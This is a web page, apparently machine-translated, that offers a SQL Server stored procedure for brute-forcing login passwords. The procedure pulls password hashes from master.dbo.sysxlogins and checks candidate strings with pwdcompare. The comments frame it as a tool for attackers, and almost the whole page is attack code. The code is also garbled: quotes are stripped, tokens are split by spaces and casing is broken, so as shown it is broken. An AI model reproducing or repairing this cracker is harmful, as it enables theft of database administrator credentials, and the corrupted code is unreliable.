A Stored Procedure for SQL Server Sa password cracking

A Stored Procedure for SQL Server Sa password cracking:
If exists (select * from dbo. sysobjects where id = object_id (N [dbo]. [p_GetPassword]) and OBJECTPROPERTY (id, NIsProcedure) = 1)
Drop procedure [dbo]. [p_GetPassword]
GO
/* -- Brute-force cracking SQL Server user password
Attackers can crack passwords with Chinese characters, special characters, characters, and trailing spaces.
For the convenience of displaying passwords with special characters, the displayed results show the ASCII
Theoretically, attackers can crack passwords of any number of digits.
The condition is that your computer is configured enough time
/* -- Call example
Exec p_GetPassword
--*/
Create proc p_GetPassword
@ Username sysname = null, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen int = 2 -- number of digits of the password to be cracked. The default value is 2 or less
As
Set @ pwdlen = case when isnull (@ pwdlen, 0) <1 then 1 else @ pwdlen-1 end
Select top 255 id = identity (int,) into # t from syscolumns
Alter table # t add constraint PK _ # t primary key (id)
Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, Jm = case when password is null then 1 else 0 end
, Pwdstr = cast (as sysname)
, Pwd = cast (as varchar (8000 ))
Into # pwd
From master. dbo. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
Declare @ s1 varchar (8000), @ s2 varchar (8000), @ s3 varchar (8000)
Declare @ l int
Select @ l = 0
, @ S1 = char (aa. id)
, @ S2 = cast (aa. id as varchar)
, @ S3 =, # t aa
Exec (
Update pwd set jm = 1, pwdstr = + @ s1 +
, Pwd = + @ s2 +
From # pwd + @ s3 +
Where pwd. jm = 0
And pwdcompare (+ @ s1 +, pwd. password, pwd. type) = 1
)
While exists (select 1 from # pwd where jm = 0 and @ l <@ pwdlen)
Begin
Select @ l = @ l + 1
, @ S1 = @ s1 ++ char (+ char (@ l/26 + 97) + char (@ l % 26 + 97) +. id)
, @ S2 = @ s2 ++, + cast (+ char (@ l/26 + 97) + char (@ l % 26 + 97) +. id as varchar)
, @ S3 = @ s3 +, # t + char (@ l/26 + 97) + char (@ l % 26 + 97)
Exec (
Update pwd set jm = 1, pwdstr = + @ s1 +
, Pwd = + @ s2 +
From # pwd + @ s3 +
Where pwd. jm = 0
And pwdcompare (+ @ s1 +, pwd. password, pwd. type) = 1
)
End
Select username = name, password = pwdstr, password ASCII = pwd
From # pwd
Go
Source: baike.duba.net